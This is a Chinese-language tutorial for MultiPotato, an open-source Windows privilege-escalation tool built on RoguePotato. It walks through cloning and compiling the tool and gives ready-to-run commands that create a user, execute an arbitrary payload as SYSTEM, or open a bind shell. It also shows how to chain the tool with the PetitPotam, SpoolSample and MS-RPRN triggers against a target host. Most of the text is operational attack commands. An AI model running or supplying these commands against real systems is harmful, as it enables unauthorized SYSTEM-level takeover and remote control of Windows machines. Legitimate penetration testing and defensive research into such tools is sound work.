MultiPotato 使用教程
MultiPotato 项目地址: https://gitcode.com/gh_mirrors/mu/MultiPotato
1. 项目介绍
MultiPotato 是一个用于权限提升的开源工具,由 @S3cur3Th1sSh1t 开发。它基于 @splinter_code 和 @decoder_it 的 RoguePotato 项目,但具有更高的灵活性。MultiPotato 不依赖特定的 SYSTEM 权限触发器,而是提供多种方法供用户选择,包括 CreateProcessWithTokenW
、CreateProcessAsUserW
、CreateUser
和 BindShell
等。
MultiPotato 的核心功能是开启一个命名管道服务器,并模拟任何连接到该服务器的用户进行操作。这使得它能应对不同的系统认证触发器,例如结合 PetitPotam 或 SpoolSample 等公开的系统权限触发器来工作。
2. 项目快速启动
2.1 环境准备
确保你已经安装了 Git 和 Visual Studio 或任何支持 C++ 编译的开发环境。
2.2 克隆项目
git clone https://github.com/S3cur3Th1sSh1t/MultiPotato.git
cd MultiPotato
2.3 编译项目
使用 Visual Studio 打开 MultiPotato.sln
文件,并进行编译。编译完成后,你将得到一个可执行文件 MultiPotato.exe
。
2.4 运行示例
以下是一些常见的运行示例:
2.4.1 使用 CreateUser
技术
MultiPotato.exe -t CreateUser
2.4.2 使用 CreateProcessAsUserW
技术
MultiPotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"
2.4.3 使用 BindShell
技术
MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"
3. 应用案例和最佳实践
3.1 创建用户
你可以配合修改后的 PetitPotam 触发器使用 MultiPotato,如在 EFSRPC 漏洞利用中:
MultiPotato.exe -t CreateUser
PetitPotamModified.exe localhost/pipe/pwned localhost
3.2 进程创建
与 SpoolSample 一起使用,可通过 CreateProcessAsUserW
在目标系统上执行任意程序:
MultiPotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"
MS-RPRN.exe \\192.168.100.150 \\192.168.100.150/pipe/pwned
3.3 远程命令执行
通过 BindShell
功能,MultiPotato 可以建立一个命令行交互式会话,允许远程控制:
MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"
4. 典型生态项目
4.1 PetitPotam
PetitPotam 是一个公开的系统权限触发器,可以与 MultiPotato 结合使用,用于创建用户或执行其他操作。
4.2 SpoolSample
SpoolSample 是另一个常用的系统权限触发器,可以与 MultiPotato 结合使用,用于进程创建或远程命令执行。
4.3 MS-RPRN
MS-RPRN 是一个用于打印机服务的工具,可以与 MultiPotato 结合使用,用于触发 CreateProcessAsUserW
或 BindShell
技术。
通过这些生态项目的结合,MultiPotato 可以在不同的场景下实现系统级别的权限提升,为安全研究人员和开发者提供了强大的工具支持。
MultiPotato 项目地址: https://gitcode.com/gh_mirrors/mu/MultiPotato